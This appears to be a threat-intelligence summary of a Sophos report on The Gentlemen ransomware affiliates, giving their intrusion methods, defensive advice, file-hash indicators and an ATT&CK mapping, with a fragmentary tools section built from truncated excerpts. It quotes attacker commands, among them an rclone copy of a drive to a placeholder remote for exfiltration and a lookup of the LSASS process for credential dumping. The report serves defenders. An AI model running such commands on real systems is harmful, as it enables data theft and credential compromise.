Sophos Details GOLD SHERWOOD’s The Gentlemen Ransomware Playbook

Summary
Sophos researchers analyzed 15 incidents linked to The Gentlemen ransomware operation, detailing how affiliates gain access, escalate privileges, evade defenses, exfiltrate data and deploy ransomware—sometimes within 24 hours of observed post-compromise activity.
Key points
- Sophos CTU analyzed 15 incidents linked to The Gentlemen RaaS, operated by the group it tracks as GOLD SHERWOOD.
- Affiliates use compromised VPN credentials and may exploit firewall vulnerabilities; one incident involved Fortinet SSL VPN access without MFA.
- Attackers stage tools in C:\PerfLogs, move laterally using RDP and legitimate credentials, and use native Windows utilities to escalate privileges.
- Rclone was observed in five incidents; attackers also used Restic and MinIO Client to adapt data exfiltration to their environment.
- Affiliates attempt to disable EDR and Windows Defender, disrupt backup services, and sometimes clear system logs before ransomware deployment.
- The median time from first observed post-compromise activity to ransomware deployment was about two days; the shortest was under 24 hours.
- Sophos recommends enforcing MFA, patching exposed firewalls and VPN appliances, monitoring administrative changes and exfiltration tools, and protecting security and backup systems.
Article Details
- Attack Vectors
- Third-party reports describe affiliates seeking vulnerable FortiGate management interfaces and testing stolen VPN credentials. CTU found artifacts suggesting possible Fortinet endpoint exploitation but could not confirm it.
- In a February incident, an attacker accessed a Fortinet SSL VPN with compromised user credentials; MFA was not enabled.
- Attackers used valid domain credentials for RDP lateral movement, including access to file servers and domain controllers.
- Attackers added accounts to administrative groups, reset administrator passwords, and established additional access through a Cloudflared service or by enabling RDP.
- Affiliates used Rclone and, in one intrusion, Restic and MinIO Client (mc) to collect and transfer victim data before encryption.
- Attackers attempted to disable security products with EDR killers and vulnerable drivers, altered Windows Defender settings, disabled backup services, cleared event logs, and deployed ransomware locally or across the network.
- Defensive Notes
- Enforce MFA for VPN and other remote access services, and promptly patch internet-facing firewalls and VPN appliances.
- Restrict and monitor administrative group changes and RDP exposure; alert on suspicious registry, firewall, and Windows Defender exclusion changes.
- Monitor unusual execution from C:\PerfLogs and similar staging directories, and investigate anomalous use of data-transfer and backup tools.
- Protect backup services against unauthorized configuration changes and investigate attempts to disable security processes, clear logs, or deploy vulnerable drivers.
Indicators of compromise
| Type | Indicator | Context |
|---|---|---|
| MD5 | 002417da707b93bf5ce3cb26d28005f6 | EDR killer identified as g111.exe. |
| MD5 | 07e9f0b8627a95960e79e930fb099e84 | Vulnerable driver identified as G11.sys and used by an EDR killer. |
| MD5 | 4741a4976c6abfb3c80c170104518b6e | EDR killer identified as acronis.exe. |
| MD5 | 622b2ca08552535bc142cb815ff9ec16 | EDR killer identified as acronis.exe. |
| MD5 | 738df7ae0097f6bef93d65be5d4a2a26 | EDR killer identified as acronis.exe or hwaudkiller.exe. |
| MD5 | 8ea97d01cbf459b94d134d05c54cd33e | Vulnerable driver identified as nogbc.sys and used by an EDR killer. |
| MD5 | b23b653541bd95bdc4da07a0b07b57bf | EDR killer identified as sophos.exe. |
| MD5 | bc4a8d7bbbeb941265dfc954539326c0 | EDR killer identified as eaanticheat2.exe. |
| MD5 | d8691ef15eea27cfefafeeb485286080 | EDR killer identified as y7D0.exe. |
| SHA1 | 058c3ff21e79770e4a60937c27b1ede227709248 | EDR killer identified as EASOLO1.exe. |
| SHA1 | 56bee9df5833a637f5c54d5911df98b0812fe643 | Vulnerable driver identified as G11.sys and used by an EDR killer. |
| SHA1 | 5c9bf6b7e4c7dc9b9227ce86e2d271d624c35147 | Vulnerable driver identified as nogbc.sys and used by an EDR killer. |
| SHA1 | 8732c1ff565828a0bdef514b5dc0dfea40c1d1f2 | EDR killer identified as g111.exe. |
| SHA1 | 8bca55b3c9bfbdf68c9b6c72a7b1bf1dd6d5e3b2 | EDR killer identified as y7D0.exe. |
| SHA1 | 9c0b05eb75f971cc25ee979e49b227b86b19e833 | EDR killer identified as EASolo1Light.exe. |
| SHA1 | a438ba2122a814320f47a056f04122f81c2ae6c5 | EDR killer identified as EASOLO2.exe. |
| SHA1 | a8ba89e67297642dcc1ae77433ab84e1f27d1792 | EDR killer identified as EASOLO2clear.exe. |
| SHA1 | b7cea81e6de895d01d01d20bd6dcfd347940b57f | EDR killer identified as eaanticheat2.exe. |
| SHA1 | be8c52474ab79a52af31e3cb2f71638299a0de1d | EDR killer identified as acronis.exe. |
| SHA1 | c96baab9b7e7ef661921d44d7900f165c794ed25 | EDR killer identified as acronis.exe or hwaudkiller.exe. |
| SHA1 | f0537cbb773ae12100b36731e7c39f5a9d852b14 | EDR killer identified as sophos.exe. |
| SHA1 | f0bc50d2d2838c5294e21cd9bce2f09bf581e508 | EDR killer identified as acronis.exe. |
| SHA256 | 0be8f415a485b11747bcfd71c9cd9781e090354728f076791ed6845b69ed78fb | Vulnerable driver identified as nogbc.sys and used by an EDR killer. |
| SHA256 | 1a9291ec869155336bf185d221d655d11c77a55ea0c8ecc0274202f74a90fcd1 | EDR killer identified as acronis.exe or hwaudkiller.exe. |
| SHA256 | 2d91a78e739891c9854c254f5b2a6b84c0e167dfa253466cbccd2cdd1c20145d | Vulnerable driver identified as G11.sys and used by an EDR killer. |
| SHA256 | 3a31ec3bf9b7eac6593a723145381f5d0f4ede076c4c8818d949a08f5596ff76 | EDR killer identified as eaanticheat2.exe. |
| SHA256 | 3c71537b64487bbf4d1793f72c75d332650d09a77b71e4d884ff15c266a847f6 | EDR killer identified as y7D0.exe. |
| SHA256 | 50f2cdf16f05da9253fa2d6eb60d5a42da14c02c551c0874c9e953d4119da69c | EDR killer identified as sophos.exe. |
| SHA256 | 68031d549de399a44bb00614b910106baccef5996623b2f1102352a52a5bb444 | EDR killer identified as EAAntiCheatClear.exe. |
| SHA256 | 761ce72420edf5e5531cdbad0e93397d7520cdead825886ca7f75cef76031720 | EDR killer identified as sophos3.exe. |
| SHA256 | 7a37acb031cddaa39ad20db0961baa5423ec53f318c49c9275c982507da76d6a | EDR killer identified as FaceITClear.exe. |
| SHA256 | 81053c2c3be8b7dbf7d5087dba05c940b3ee4fd95524272651c816b72c5a9443 | EDR killer identified as g111.exe. |
| SHA256 | a348f5fa048a09188bd706fd3d4efca978990caf3355ecfee501c9f1e19c0efd | EDR killer identified as acronis.exe. |
| SHA256 | bf7a2fb7f7256809dc690213b85f747cef8db7b909caf9783cac181912fb6207 | EDR killer identified as sophos2.exe. |
| SHA256 | ccdde8091d63eaafbe30d9f0482afd245abc10ab16e21ae9254e51e42cb80ae8 | Vulnerable driver identified as dmx.sys and used by an EDR killer. |
| SHA256 | ddba5b4e7a7ada77d56477e9d41c008f93e81d9a33ed09e77cb2af624fa694fe | EDR killer identified as acronis.exe. |
MITRE ATT&CK
T1003.001 · LSASS MemoryThird-party research confirmed Mimikatz credential harvesting in a The Gentlemen compromise; CTU separately observed attackers retrieving the LSASS process identifier.T1021.001 · Remote Desktop ProtocolAttackers authenticated over RDP to multiple internal systems, including a file server and domain controllers.T1046 · Network Service DiscoveryAttackers used Advanced IP Scanner and SoftPerfect Network Scanner to enumerate the victim network.T1059.001 · PowerShellAttackers ran PowerShell commands to add Windows Defender scanning exclusions.T1059.003 · Windows Command ShellAttackers executed Windows administrative commands and a batch script from a NETLOGON share.T1070.001 · Clear Windows Event LogsIn one incident, an attacker deleted Application, System, and Security logs on multiple hosts.T1078 · Valid AccountsAn attacker authenticated to a Fortinet SSL VPN with compromised user credentials and used valid domain credentials during lateral movement.T1098.007 · Additional Local or Domain GroupsAttackers used Windows administrative commands to add accounts to local Administrators and domain admins groups.T1112 · Modify RegistryAttackers changed registry settings to enable RDP or disable Windows Defender real-time monitoring.T1133 · External Remote ServicesThe attacker gained initial network access through an externally accessible Fortinet SSL VPN service.T1486 · Data Encrypted for ImpactThe deployed ransomware encrypted files and dropped README-GENTLEMEN.txt ransom notes.T1490 · Inhibit System RecoveryAttackers disabled backup and recovery services immediately before ransomware deployment.T1543.003 · Windows ServiceAn attacker installed a Cloudflared agent as a Windows service to maintain a remote access channel.T1562.001 · Disable or Modify ToolsAttackers used EDR killers and vulnerable drivers against security processes and added Windows Defender scanning exclusions.T1567.002 · Exfiltration to Cloud StorageAttackers used Rclone to transfer victim data to remote storage locations and MinIO Client (mc) to copy data to object storage.
CVE
Threat Actors
Malware
Vendors
Products
Datto RMMIn another incident, the threat actor used the Datto RMM tool. However, available telemetry did not make it clear how this tool facilitated the attack. It was only deployed to one compromised device, and no otherESXiGOLD SHERWOOD provides custom ransomware to affiliates. Although there are Windows, Linux, and ESXi-compatible versions of the ransomware, CTU researchers only observed the Windows variant deployed in the analyzedFortiGatein March, Group-IB described how affiliates conducted reconnaissance to identify internet-exposed FortiGate firewall management interfaces vulnerable to CVE-2024-55591. In May, leaked Rocket chat logs showed theFortinet SSL VPNinitial access to a victim’s environment by using compromised user credentials to authenticate to a Fortinet SSL VPN service. The connection originated from an external IP address geolocated to the Netherlands andLinuxGOLD SHERWOOD provides custom ransomware to affiliates. Although there are Windows, Linux, and ESXi-compatible versions of the ransomware, CTU researchers only observed the Windows variant deployed in the analyzedMicrosoft Windowsanalyzed by CTU researchers, the attackers staged tools in the C:\PerfLogs directory. This legitimate Windows system directory typically contains performance monitoring logs. It is not commonly scrutinized bySophos EDRattacker downloaded a vulnerable driver (xkpsm.sys) before leveraging an executable (x.exe) to target Sophos EDR endpoint processes. Existing countermeasures detected these attempts.Windows DefenderIn addition, multiple intrusions involved PowerShell to enforce monitoring exclusions for Windows Defender. For example, the following command excluded an entire directory (the C: drive) from scanning, effectively
Tools
Advanced IP ScannerIn multiple observed intrusions, the threat actors used Advanced IP Scanner to enumerate the network. In one incident, SoftPerfect Network Scanner was executed multiple times across numerous servers in preparation forCloudflaredaccess. In one incident, the threat actor used a compromised administrator account to install a Cloudflared agent as a Windows service. The service was configured to execute the cloudflared.exe tunnel via aFileZillarevealed multiple data exfiltration methods in The Gentlemen ransomware incidents. While MEGAsync and FileZilla occasionally appeared on victims’ systems, Rclone was clearly the preferred exfiltration tool as it wasGentleKillerIn one incident, an attacker deployed three different variants of the custom toolset that ESET calls GentleKiller in an attempt to disable the EDR solution.HavocMEGAsyncCTU analysis revealed multiple data exfiltration methods in The Gentlemen ransomware incidents. While MEGAsync and FileZilla occasionally appeared on victims’ systems, Rclone was clearly the preferred exfiltration toolMimikatztasklist /v /fo csv | findstr /i "lsass"The PID can then be targeted by credential dumping tools such as Mimikatz. Although these tools did not appear in Sophos telemetry, third-party research confirms the use ofMinIO Client (mc)Finally, the attacker employed an additional tool (MinIO Client (mc)) to copy data to object storage:PsExecstaging directories (e.g., C:\PerfLogs\, C:\Users\<username>\Documents\AVAST2\), lateral movement via PsExec, and domain-wide distribution through NETLOGON shares (e.g., \\<compromisedRCloneGentlemen ransomware incidents. While MEGAsync and FileZilla occasionally appeared on victims’ systems, Rclone was clearly the preferred exfiltration tool as it was observed in five of the incidents.Resticrclone copy z:\ <remote location> --include-from filter.txt -pApproximately 25 minutes later, the attacker pivoted to using the Restic backup utility, beginning with repeated repository initialization attempts:SoftPerfect Network Scannerthe threat actors used Advanced IP Scanner to enumerate the network. In one incident, SoftPerfect Network Scanner was executed multiple times across numerous servers in preparation for lateral movement andXkpsm-KillerThe open-source Xkpsm-Killer tool has not previously been observed in The Gentlemen ransomware compromises. The attacker downloaded a vulnerable driver (xkpsm.sys) before leveraging an executable (x.exe) to target